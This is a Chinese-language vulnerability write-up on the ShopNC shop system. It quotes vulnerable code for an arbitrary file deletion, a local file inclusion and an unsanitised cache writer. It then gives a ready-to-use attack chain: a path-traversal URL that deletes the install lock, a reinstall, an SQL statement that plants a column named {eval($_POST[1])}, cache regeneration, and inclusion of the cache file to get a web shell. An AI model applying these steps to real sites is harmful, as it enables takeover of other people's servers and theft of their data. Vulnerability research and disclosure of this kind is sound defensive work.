前言

shopnc 多个漏洞结合,可getshell 有点暴力-_-

任意文件删除

文件 control\store.php 1438 行 (还有几个同样的地方)

1
2
3
4
5
6
7
8
........
$model_upload = Model('upload');
		$file_info = $model_upload->getOneUpload(intval($_GET['file_id']));
		if(!$file_info){
			@unlink(ATTACH_SLIDE.DS.$_GET['img_src']);
		}else{

........

本地文件包含

文件 /framework/core/base.php 71行

1
2
3
4
5
6
7
$act_file = realpath( BasePath.DS."control".DS.$_GET['act'].".php" );
	}
	if ( is_file( $act_file ) )
	{
		require( $act_file );
		$class_name = $_GET['act']."Control";
		if ( class_exists( $class_name ) )

后台更新缓存写shell

文件 model/adv_model.php 416 行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
/**
	 * 更新一条广告缓存
	 *
	 * @param unknown_type $adv
	 * @return unknown
	 */
	public function makeAdvCache($adv){
		$lang	= Language::getLangContent();
		$tmp .= "<?php \r\n";
		$tmp .= "defined('InShopNC') or exit('Access Invalid!'); \r\n";
		if (is_numeric($adv) &amp;&amp; $adv > 0){

			$condition['adv_id'] = $adv;
			$adv_info = $this->getList($condition);
			$adv = $adv_info['0'];
		}
    ..................................
    	               $content = addslashes($v);
			$content = str_replace('$','\$',$content);
			//防止有$符号被解析成变量
			$tmp .= '$'.$k." = \"".$content."\"; \r\n";
		}
		//缓存文件存放位置及文件名
		$cache_file = BasePath.'/cache/adv/adv_'.$adv['adv_id'].'.cache.php';
		file_put_contents($cache_file,$tmp);

``` 

跟进  getList  函数  

``` php
	public function getList($condition=array(), $page='', $limit='', $orderby=''){
		$param	= array();
		$param['table']	= 'adv';
		$param['field'] = $condition['field']?$condition['field']:'*';
		$param['where']	= $this->getCondition($condition);
		if($orderby == ''){
			$param['order'] = 'slide_sort, adv_id desc';
		}else{
			$param['order'] = $orderby;
		}
		$param['limit'] = $limit;
		return Db::select($param,$page);
	}

写文件时 从数据库中遍历key 跟value 未过滤key key 可以从数据库读取,当有数据库可控时 即可写入任意文件

ShopNc GetShell

结合以上三个漏洞,即可优雅的 getshell
流程图为

1
任意文件删除 => 重装 => 更改数据库 shopnc_adv 键值 =>更新广告缓存 =>getshell

具体步骤
1:http://www.xxx.com/index.php?act=store&op=dorp_img&file_id=16&img_src=/../../../install/lock
2:重装系统
3:进入MySQL 执行sql ALTER TABLE shopnc_adv ADD {eval($_POST[1])} VARCHAR( 100 ) NOT NULL ;
4:进入后台 更新广告缓存 http://www.xxx.com/admin/index.php?act=adv&op=adv_edit&adv_id=14
5:连接shell http://www.xxx.com/index.php?act=../cache/adv/adv_14.cache